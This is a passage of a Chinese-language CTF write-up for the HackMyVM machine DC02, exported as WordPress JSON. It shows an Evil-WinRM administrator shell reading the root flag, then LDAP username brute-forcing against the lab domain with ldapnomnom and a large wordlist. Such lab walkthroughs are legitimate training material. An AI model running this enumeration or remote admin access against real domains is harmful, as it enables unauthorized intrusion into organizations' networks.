endpoint\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents&gt; whoami\nsoupedecode\\administrator\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents&gt; cd ..\/desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\desktop&gt; ls\n\n    Directory: C:\\Users\\Administrator\\desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----         6\/12\/2024   1:01 PM             33 root.txt\n\n*Evil-WinRM* PS C:\\Users\\Administrator\\desktop&gt; type root.txt\nd41d8cd98f00b204e9800998ecf8427e<\/code><\/pre>\n<h2>LDAP\u679a\u4e3e<\/h2>\n<p>\u770b\u5230\u6709\u5e08\u5085\u8fdb\u884c\u4e86LDAP\u679a\u4e3e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u53e3\u4ee4\u7684\u7206\u7834\uff1a<a href=\"https:\/\/alientec1908.github.io\/DC02_HackMyVM_Medium\/\">https:\/\/alientec1908.github.io\/DC02_HackMyVM_Medium\/<\/a><\/p>\n<blockquote>\n<p>\u5de5\u5177 \uff1a<a href=\"https:\/\/github.com\/lkarlslund\/ldapnomnom\">https:\/\/github.com\/lkarlslund\/ldapnomnom<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ go install github.com\/lkarlslund\/ldapnomnom@latest\ngo: github.com\/lkarlslund\/ldapnomnom@latest: module github.com\/lkarlslund\/ldapnomnom: Get &quot;https:\/\/proxy.golang.org\/github.com\/lkarlslund\/ldapnomnom\/@v\/list&quot;: dial tcp 142.250.66.81:443: i\/o timeout\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ go env -w GO111MODULE=on\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ go env -w GOPROXY=https:\/\/goproxy.cn,direct\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ go env | grep GOPROXY\nGOPROXY=&#039;https:\/\/goproxy.cn,direct&#039;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ go install github.com\/lkarlslund\/ldapnomnom@latest\ngo: downloading github.com\/lkarlslund\/ldapnomnom v1.5.1\ngo: downloading github.com\/Showmax\/go-fqdn v1.0.0\ngo: downloading github.com\/lkarlslund\/ldap\/v3 v3.4.4-2\ngo: downloading github.com\/schollz\/progressbar\/v3 v3.17.0\ngo: downloading github.com\/Azure\/go-ntlmssp v0.0.0-20221128193559-754e69321358\ngo: downloading github.com\/go-asn1-ber\/asn1-ber v1.5.4\ngo: downloading github.com\/jcmturner\/gokrb5\/v8 v8.4.4\ngo: downloading github.com\/mitchellh\/colorstring v0.0.0-20190213212951-d06e56a500db\ngo: downloading github.com\/rivo\/uniseg v0.4.7\ngo: downloading golang.org\/x\/term v0.25.0\ngo: downloading golang.org\/x\/crypto v0.7.0\ngo: downloading github.com\/jcmturner\/gofork v1.7.6\ngo: downloading github.com\/jcmturner\/goidentity\/v6 v6.0.1\ngo: downloading golang.org\/x\/sys v0.26.0\ngo: downloading github.com\/jcmturner\/dnsutils\/v2 v2.0.0\ngo: downloading github.com\/hashicorp\/go-uuid v1.0.3\ngo: downloading github.com\/jcmturner\/aescts\/v2 v2.0.0\ngo: downloading github.com\/jcmturner\/rpc\/v2 v2.0.3\ngo: downloading golang.org\/x\/net v0.8.0\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ \/home\/kali\/go\/bin\/ldapnomnom -input \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt -server SOUPEDECODE.LOCAL      \n __    ____  _____ _____                             \n|  |  |    \\|  _  |  _  |___ ___ _____ ___ ___ _____ \n|  |__|  |  |     |   __|   | . |     |   | . |     |\n|_____|____\/|__|__|__|  |_|_|___|_|_|_|_|_|___|_|_|_|\n\nIN  SPACE  NO  ONE  CAN  HEAR  YOU  NOM  NOM  USERNAMES\n\nadmin\ncharlie\nadministrator\nwreed11\n^C<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>DC02 \u4e00\u6253\u5f00\u5c31\u662f\u4e00\u4e2a\u4e0b\u9a6c\u5a01\uff1a \u5c06\u540d\u5b57\u4fee\u6539\u4e00\u4e0b\u5c31\u884c\u4e86\uff1a \u968f\u4fbf\u4fee\u6539\u5565\u90fd\u884c\u3002 \uff01\uff01\uff01\uff01\uff01\u8be5\u5427\u5527\u591a\u6b21\u81ea\u5df1\u5173\u673a\uff0c\u4e2d\u9014 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-863","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/863","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=863"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/863\/revisions"}],"predecessor-version":[{"id":864,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/863\/revisions\/864"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=863"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=863"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}